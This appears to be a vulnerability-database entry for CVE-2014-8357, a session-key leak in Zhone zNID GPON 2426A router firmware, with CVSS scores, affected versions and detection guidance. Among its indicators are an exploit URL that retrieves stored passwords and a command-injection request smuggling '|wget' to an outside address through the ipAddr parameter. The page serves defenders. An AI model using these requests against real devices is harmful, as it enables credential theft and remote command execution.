cbcvebase.
CVE-2014-8357
published 2017-10-17

CVE-2014-8357: backupsettings.html in the web administrative portal in Zhone zNID GPON 2426A before S3.0.501 places a session key in a URL, which allows remote attackers to…

PriorityP273high8.8CVSS 3.0
AVNACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
5.44%
91.7th percentile
backupsettings.html in the web administrative portal in Zhone zNID GPON 2426A before S3.0.501 places a session key in a URL, which allows remote attackers to obtain arbitrary user passwords via the sessionKey parameter in a getConfig action to backupsettings.conf.

Affected

1 ranges
VendorProductVersion rangeFixed in
dasanzhoneznid_2426a_firmware< s3.0.501s3.0.501

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://<host>/backupsettings.conf?action=getConfig&sessionKey=<sessionKey>
path/backupsettings.conf
path/backupsettings.html
path/menuBcm.js
path/uploadsettings.cgi
path/zhnsystemconfig.cgi
filenamebackupsettings.conf
command/zhnping.cmd?&test=traceroute&sessionKey=985703201&ipAddr=192.168.1.1|wget%20http://192.168.1.17/l00per_was_here&ttl=30&wait=3&queries=3
  • Detect GET requests to /backupsettings.conf with 'action=getConfig' and a 'sessionKey' parameter — this is the core exploit path for CVE-2014-8357 password disclosure.
  • Monitor for the sessionKey parameter appearing in HTTP request URLs (not just POST bodies), indicating session token leakage via Referer or logs.
  • Detect command injection attempts via the 'ipAddr' parameter in requests to /zhnping.cmd, particularly pipe characters followed by OS commands (e.g., '|wget').
  • Alert on POST requests to /uploadsettings.cgi with multipart/form-data containing a file named 'backupsettings.conf', which can be used to overwrite admin credentials.
  • Detect access to /menuBcm.js followed by manipulation of its response (e.g., via proxy interception replacing 'admin' with a low-privilege username) as an indicator of privilege escalation (CVE-2014-8356).
  • Detect stored XSS payloads in GET requests to /zhnsystemconfig.cgi via the snmpSysName, snmpSysLocation, or snmpSysContact parameters (e.g., presence of '<script>' tags).
  • ·Passwords in the backup configuration file are Base64-encoded, not encrypted — any attacker retrieving backupsettings.conf can trivially decode all credentials.
  • ·Access control on the Zhone web portal is enforced client-side via JavaScript only; server-side authorization is absent, meaning any authenticated low-privilege user can reach admin functions by manipulating JS responses.
  • ·The vulnerability affects Zhone zNID GPON 2426A firmware before S3.0.501; the exploit-db advisory recommends upgrading to S3.1.241 for full remediation of all reported issues.

CVSS provenance

nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.04.0MEDIUMAV:N/AC:L/Au:S/C:P/I:N/A:N
vulncheck8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.